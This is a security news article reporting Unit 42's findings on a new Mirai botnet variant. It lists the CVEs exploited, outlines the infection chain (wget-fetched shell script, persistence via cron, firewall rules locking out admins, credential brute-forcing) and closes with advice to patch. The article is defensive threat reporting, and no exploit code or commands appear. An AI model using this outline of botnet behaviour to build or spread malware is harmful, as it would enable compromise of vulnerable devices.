A new Mirai variant is targeting known flaws in D-Link, Netgear & SonicWall devices, as well as newly discovered flaws in unknown IoT devices.
This new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear & SonicWall devices — as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.
Known Vulnerabilities
Since Feb. 16, the new variant has been targeting 6 known vulnerabilities & 3 previously unknown ones – in order to infect systems & add them to a botnet. It’s only the latest variant of Mirai to come to light, years after source code for the malware was released in Oct. 2016.
“The attacks are still ongoing at the time of this writing,” observed researchers with Palo Alto Networks’ Unit 42 team on Mon. “Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviours such as downloading & executing Mirai variants & brute-forcers.”
New & Old Flaws
The attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit (CVE-2020-25506); Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 & CVE-2021-27562); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); & a Netis WF2419 wireless router exploit (CVE-2019-19356 ).
The botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.
“We cannot say with certainty what the targeted devices are for the unidentified exploits,” Zhibin Zhang, principal researcher for Unit 42, explained. “However, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.”
2 RCE Attacks
The exploits themselves include 2 RCE attacks — including an exploit targeting a command-injection vulnerability in certain components; & an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitised).
The 3rd exploit targets the op type parameter, which is not properly sanitised leading to a command injection, said researchers.
The latter has “been observed in the past being used by [the] Moobot [botnet], however the exact target is unknown,” researchers noted.
A Set of Binaries
After initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware’s infrastructure. The shell script then downloads several Mirai binaries & executes them, 1-by-1.
One such binary includes lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs & start-up scripts); creates packet filter rules to bar incoming traffic directed at the commonly used SSH, HTTP & telnet ports (to make remote access to the affected system more challenging for admins); & schedules a job that aims to rerun the lolol.sh script every hour (for persistence).
Cron Configuration
Of note, this latter process is flawed, stated researchers, as the cron configuration is incorrect.
Another binary (install.sh) downloads various files & packages – including Go Lang v1.9.4, the “nbrute” binaries (that brute-force various credentials) & the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by “nbrute”).
The final binary is called dark.[arch] & is based on the Mirai codebase. This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute forcing SSH connections using hardcoded credentials in the binary.
Mirai Variants Continue to Pop Up
The variant is only the latest to rely on Mirai’s source code, which has proliferated into more than 60 variants since bursting on the scene with a massive distributed denial of service (DDoS) takedown of DNS provider Dyn in 2016.
In 2020, a Mirai variant was discovered targeting Zyxel network-attached storage (NAS) devices using a critical vulnerability that was only recently discovered, according to security researchers.
In 2019, a variant of the botnet was discovered finding & targeting vulnerabilities in enterprise wireless presentation & display systems. A 2018 variant was used to launch a series of DDoS campaigns against financial-sector businesses.
Apply Patches
Researchers outlined that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.
“The IoT realm remains an easily accessible target for attackers,” according to Unit 42’s report. “Many vulnerabilities are very easy to exploit & could, in some cases, have catastrophic consequences.”
https://www.cybernewsgroup.co.uk/virtual-conference-april-2021/
